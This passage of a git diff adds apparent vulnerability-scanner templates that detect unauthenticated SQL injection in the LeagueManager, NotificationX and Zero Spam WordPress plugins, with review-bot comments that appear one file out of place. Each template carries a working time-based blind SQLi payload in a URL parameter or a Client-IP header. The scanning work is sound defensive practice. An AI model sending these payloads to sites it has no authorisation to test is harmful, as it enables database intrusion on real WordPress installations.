+ name: LeagueManager <= 3.9.11 - SQL Injection
+ author: theamanrawat
+ severity: critical
+ description: |
+ The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action (available to unauthenticated users), leading to an SQL injection.
+ reference:
+ - https://wpscan.com/vulnerability/f3be48f5-ae2c-4e27-80ca-664829b8fba3
+ - https://wordpress.org/plugins/leaguemanager/
+ metadata:
+ verified: true
+ tags: sqli,wp,wp-plugin,wordpress,leaguemanager,unauth
+
+http:
+ - raw:
+ - |
+ @timeout: 10s
+ GET /?season=1&league_id=1season=1&league_id=1'+AND+(SELECT+1909+FROM+(SELECT(SLEEP(6)))ZiBf)--+qODp&match_day=1&team_id=1&match_day=1&team_id=1 HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'duration>=6'
+ - 'status_code == 200'
+ - 'contains(content_type, "text/html")'
+ - 'contains(body, "LeagueManagerAjaxL10n")'
+ condition: and
diff --git a/http/vulnerabilities/wordpress/notificationx-sqli.yaml b/http/vulnerabilities/wordpress/notificationx-sqli.yaml
new file mode 100644
index 0000000000..7a6a6c809f
--- /dev/null
+++ b/http/vulnerabilities/wordpress/notificationx-sqli.yaml
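Review bot: The request line repeats `season`, `league_id`, `match_day` and `team_id`, and `league_id=1season=1` runs two parameters together with no `&` between them, which reads like a copy-paste artifact rather than a deliberate shape. If the duplicated parameters are what the vulnerable handler requires, a YAML comment above the raw block such as `# duplicated query parameters are intentional; the handler reads the later occurrence` would stop the next maintainer from "cleaning" the request and silently breaking the check. Unlike the other wpscan-sourced templates in this commit, there is no `remediation` line, and `max-request: 1` is missing from metadata.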
@@ -0,0 +1,43 @@
+id: notificationx-sqli
+
+info:
+ name: NotificationX < 2.3.12 - SQL Injection
+ author: theamanrawat
+ severity: high
+ description: |
+ The plugin does not validate and escape the id parameter in its notificationx/v1/notification REST endpoint before using it in a SQL statement, which could allow unauthenticated attackers to perform SQL Injection attacks.
+ reference:
+ - https://wpscan.com/vulnerability/d1480717-726d-4be2-95cb-1007a3f010bb
+ - https://wordpress.org/plugins/notificationx/
+ remediation: Fixed in version 2.3.12
+ metadata:
+ verified: true
+ tags: sqli,wp,wp-plugin,wordpress,notificationx-sql-injection
+
+http:
+ - raw:
+ - |
+ GET /wp-json/ HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ @timeout: 10s
+ GET /wp-json/notificationx/v1/notification/1?api_key={{md5('{{apikey}}')}}&id[1]=%3d(SELECT/**/1/**/WHERE/**/SLEEP(6)) HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'duration>=6'
+ - 'status_code == 401'
+ - 'contains(content_type, "application/json")'
+ - 'contains(body, "There is no notification created with this id")'
+ condition: and
+
+ extractors:
+ - type: regex
+ name: apikey
+ group: 1
+ regex:
+ - '"home":"(.*?)",'
+ internal: true
diff --git a/http/vulnerabilities/wordpress/zero-spam-sql-injection.yaml b/http/vulnerabilities/wordpress/zero-spam-sql-injection.yaml
new file mode 100644
index 0000000000..92da0a19bf
--- /dev/null
+++ b/http/vulnerabilities/wordpress/zero-spam-sql-injection.yaml
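Review bot: The description says the endpoint is reachable by unauthenticated attackers, but the tags omit `unauth`, which contus-video-gallery-sqli, leaguemanager-sql-injection and zero-spam-sql-injection in this same commit all carry; `tags: sqli,wp,wp-plugin,wordpress,notificationx,unauth` would align them, and it replaces the `notificationx-sql-injection` tag, which duplicates the template id instead of naming the product. The matcher pairs a delay check with `status_code == 401` and the "There is no notification created with this id" message, which is non-obvious to a reader; presumably the delay fires before the key check rejects the request, and a comment above the matcher stating that expectation would document it. `max-request: 2` is missing from metadata.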
@@ -0,0 +1,32 @@
+id: zero-spam-sql-injection
+
+info:
+ name: WordPress Zero Spam <= 2.1.1 - Blind SQL Injection
+ author: theamanrawat
+ severity: critical
+ description: |
+ The WordPress Zero Spam WordPress plugin was affected by an Unauthenticated Blind SQL Injection security vulnerability.
+ reference:
+ - https://wpscan.com/vulnerability/44cc8d59-9b45-46b7-afaf-894e4ba62dd5
+ - https://wordpress.org/plugins/zero-spam/
+ remediation: Fixed in version 2.2.0
+ metadata:
+ verified: true
+ tags: wp,wp-plugin,wordpress,zero-spam,sqli,unauth
+
+http:
+ - raw:
+ - |
+ @timeout: 10s
+ GET / HTTP/1.1
+ Host: {{Hostname}}
+ Client-IP: '+(select(0)from(select(sleep(7)))v)+'
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'duration>=7'
+ - 'status_code == 200'
+ - 'contains(content_type, "text/html")'
+ - 'contains(body, "zerospam-js")'
+ condition: and
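Review bot: `max-request: 1` is absent from the metadata block, while the two modified templates in this commit record `max-request: 2` alongside `verified`. The description repeats the product name, `The WordPress Zero Spam WordPress plugin was affected by an Unauthenticated Blind SQL Injection security vulnerability.`; `The WordPress Zero Spam plugin is affected by an unauthenticated blind SQL injection vulnerability.` reads cleaner and matches the lower-case style of the other descriptions.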